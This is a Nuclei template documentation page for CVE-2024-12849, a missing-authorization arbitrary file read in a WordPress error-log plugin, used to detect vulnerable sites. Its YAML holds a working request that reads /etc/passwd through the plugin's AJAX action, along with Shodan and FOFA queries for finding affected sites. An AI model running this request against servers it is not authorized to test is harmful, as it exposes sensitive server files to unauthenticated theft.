Skip to content
Nuclei Templates

Error Log Viewer By WP Guru <= 1.0.1.3 - Missing Authorization to Arbitrary File Read

ID: CVE-2024-12849

Severity: high

Author: s4e-io

Tags: cve,cve2024,wordpress,wp,wp-plugin,error-log-viewer-wp,lfi

Description

Section titled “Description”

The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.

YAML Source

Section titled “YAML Source”
id: CVE-2024-12849


info:
  name: Error Log Viewer By WP Guru <= 1.0.1.3 - Missing Authorization to Arbitrary File Read
  author: s4e-io
  severity: high
  description: |
    The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-12849
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/57888e36-3a61-4452-b4ea-9db9e422dc2d?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12849
    - https://github.com/advisories/GHSA-899p-f2mf-g895
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-12849
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 2
    vendor: wp-guru
    product: error-log-viewer-wp
    framework: wordpress
    shodan-query: http.html:"wp-content/plugins/error-log-viewer-wp"
    fofa-query: body="wp-content/plugins/error-log-viewer-wp"
  tags: cve,cve2024,wordpress,wp,wp-plugin,error-log-viewer-wp,lfi


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/error-log-viewer-wp")'
        internal: true


  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd


    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - 'contains(content_type, "application/octet-stream")'
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100907225c49a837e3f7e4f4471dd5cd29c5de2d4762df934f5568f3f8186beb2740221009d42f9eaff23860bc951957d067b292cd0c3e0cc42703668c26b424deebeaa04:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-12849.yaml"

View on Github